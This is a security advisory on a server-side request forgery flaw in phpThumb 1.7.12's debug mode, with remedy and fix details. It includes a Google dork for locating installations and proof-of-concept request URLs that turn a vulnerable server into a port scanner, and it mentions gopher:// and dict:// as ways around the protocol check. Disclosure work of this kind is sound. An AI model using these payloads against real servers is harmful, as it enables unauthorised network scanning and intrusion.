phpThumb 1.7.12 Server Side Request Forgery

`#phpThumb 'phpThumbDebug' Server Side Request Forgery  
#Google Dork: inurl:phpThumb.php  
#Author: Rafay Baloch And Deepanker Arora  
#Company: RHA InfoSEC  
#Impact: High  
#Vendor: http://phpthumb.sourceforge.net/#download  
#Version: 1.7.12  
#Status: Reported And Fixed  
  
===========  
Description  
===========  
  
A server side request forgery is not a single vulnerability, however it  
represents different classes of vulnerability. In a server side request  
forgery an attaker creates forged packets to communicate with the  
intra/internet by using the vulnerable server as a pivot point. Several  
other different attacks can be performed, however we will keep it at a  
basic level for a better understanding.  
  
===========  
Explanation  
===========  
  
The debug mode in phpThumb was introduced for trouble shooting purposes,  
however the debug mode when turned can result in a server side request  
forgery. By exploiting it a SSRF vulnerability an attacker may be able to  
scan local or remote ports, fingerprint services etc. Let's take a look at  
the piece of code responsible for fetching an external image:  
  
if ($rawImageData = phpthumb_functions::SafeURLread($phpThumb->src, $error,  
$phpThumb->config_http_fopen_timeout,  
  
$phpThumb->config_http_follow_redirect)) {  
$phpThumb->DebugMessage('SafeURLread('.$phpThumb->src.')  
succeeded'.($error ? ' with messsages: "'.$error.'"' :  
  
''), __FILE__, __LINE__);  
$phpThumb->DebugMessage('Setting source data from URL  
"'.$phpThumb->src.'"', __FILE__, __LINE__);  
$phpThumb->setSourceData($rawImageData, urlencode($phpThumb->src));  
} else {  
$phpThumb->ErrorImage($error);  
}  
}  
if ($rawImageData = phpthumb_functions::SafeURLread($_GET['src'], $error,  
$phpThumb->config_http_fopen_timeout,  
  
$phpThumb->config_http_follow_redirect)) {  
$md5s = md5($rawImageData);  
}  
  
The above code is responsible for fetching an external image file with the  
"src" parameter. The code doesn't checks if the image retrived is actually  
a valid image. Therefore, under debug mode set to "True" it would display  
the error message received from the lower layer network sockets which would  
enable an attacker to launch a server side request forgery attack.  
  
Furthurmore, I noticed that there was a validation being perfomed for  
protocols such as file://.  
  
if (preg_match('#^(f|ht)tp\://#i', $phpThumb->src)) {  
  
However, this doesn't prevent this attack completly, as an attacker may be  
able to leverage other protocols such as gopher://, dict:// etc in order to  
exploit this vulnerability.  
  
Proof of Concept  
================  
  
Scanme.nmap.org has known ports 22, 80 and 25 open, In case where the  
server errors are turned on, there would be a distinct response by probing  
open ports vs closed ports.  
  
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:22&phpThumbDebug=9//  
Open Port  
  
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:80&phpThumbDebug=9//  
Open port  
  
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:1337&phpThumbDebug=9//  
Closed port  
  
Remedy  
======  
  
It is recommended to turn off the "debug" mode. The debug mode can be  
modfying by changing the following lines inside the php code.  
  
"$PHPTHUMB_CONFIG['disable_debug']= false;"  
  
With:  
  
"$PHPTHUMB_CONFIG['disable_debug']= true;".  
  
  
Fix  
===  
  
1) The authors explicitly disabled all other protocols then http/https/ftp  
protocols. This minimizes few of the attack vectors.  
  
https://github.com/JamesHeinrich/phpThumb/commit/457a37d4a22ac9cdbbfe19577376622e58df81b0  
  
2) The debug_mode has been disabled and the "High Security Mode" has been  
enabled by default in version phpThumb 1.7.12. Take a look at the author's  
note:  
  
3) Further security improvements are to be done in the future versions.  
  
References  
==========  
  
http://www.rafayhackingarticles.net/2013/11/phpthumb-server-side-request-forgery.html  
`